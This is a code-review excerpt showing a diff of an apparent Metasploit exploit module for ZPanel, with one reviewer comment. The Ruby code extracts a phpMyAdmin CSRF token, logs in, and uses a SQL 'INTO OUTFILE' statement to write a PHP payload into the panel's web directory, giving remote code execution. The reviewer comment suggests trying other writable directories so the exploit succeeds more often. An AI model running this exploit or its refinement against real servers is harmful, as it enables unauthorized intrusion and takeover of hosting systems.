modules/exploits/multi/http/zpanel_information_disclosure_rce.rb

```diff
@@ -0,0 +1,277 @@
+          'uri'=>normalize_uri("#{uri}", "etc", "apps", "phpmyadmin", "index.php"),
+          'version'=>'1.1',
+          'Cookie'=>"#{sid}"
+        })
+
+        unless res
+          fail_with(Failure::Unknown, 'Connection timed out while attempting to get CSRF token')
+        end
+        token = "#{res.body.to_s.scan(/(?<=name\="token" value\=")[A-Za-z0-9]+/)}"
+        token = token.to_s[2..-3]
+        token = token[0..31]
+        cookies = res.get_cookies
+
+        cookies = cookies.split("; ")
+        cookies = "#{cookies[-1]} #{cookies[1]}; #{cookies[2]}; #{cookies[3]}; #{sid}"
+
+        if token.length > 0
+          print_good("CSRF token identified!")
+          print_good("CSRF token = #{token}")
+         return cookies, token, sid
+        else
+          print_error("CSRF token could not be identified...")
+        end
+        else
+          print_error("PHPSESSID could not be identified...")
+        end
+      end
+
+      def login_phpmyadmin(uri, uname, passwd, cookies, token, sess_id)
+        old_cookies = cookies
+
+        res = send_request_cgi({
+        'method'=>'POST',
+        'uri'=>normalize_uri("etc", "apps", "phpmyadmin", "index.php"),
+        'cookie'=>cookies,
+        'ctype'=>"application/x-www-form-urlencoded",
+        'headers'=>{
+        'Referer'=>"http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
+        },
+        'vars_post'=>{
+        'pma_username'=>uname,
+        'pma_password'=>passwd,
+        'server'=>"1",
+        'lang'=>"en",
+        'collation_connection'=>"utf8_general_ci",
+        'token'=>token
+        }
+      })
+
+        cookies = "#{res.get_cookies}"
+
+        old_cookies = old_cookies.split("; ")
+        cookies = cookies.split("; ")
+
+        new_cookies =  "#{old_cookies[0]}; "
+        new_cookies << "#{old_cookies[1]}; "
+        new_cookies << "#{old_cookies[2]}; "
+        new_cookies << "#{old_cookies[3]}; "
+        new_cookies << "#{cookies[0]}; "
+        new_cookies << "#{cookies[1]} "
+        new_cookies << "#{sess_id}"
+
+        token = res['Location'].to_s.scan(/(?<=token\=)[A-Za-z0-9]+/)
+        token = token.to_s[2..-3]
+
+        res = send_request_cgi({
+        'method'=>'GET',
+        'uri'=>normalize_uri("etc", "apps", "phpmyadmin", "index.php"),
+        'Referer'=>"http://#{datastore['RHOST']}/etc/apps/phpmyadmin/",
+        'cookie'=>new_cookies,
+        'vars_get'=>{
+        'token'=>token
+        }
+        })
+
+      unless res
+      fail_with(Failure::Unknown, 'Connection timed out while attempting to login to phpMyAdmin')
+      end
+
+      if res.code == 200 and res.body.to_s =~ /phpMyAdmin is more friendly with a/
+      print_good("PHPMyAdmin login successful!")
+      return new_cookies, token
+    end
+
+  end
+
+    def do_sql(cookies, token, uri)
+
+      fname = "#{rand_text_alpha_upper(5)}.php"
+      sql_stmt = "SELECT \"<?php #{payload.encoded} ?>\" INTO OUTFILE \"/etc/zpanel/panel/#{fname}\""
```

Comment:
Just a pointer, you might want to loop over some of the dirs here, as often the basedir is not writeable (but bin/ often is).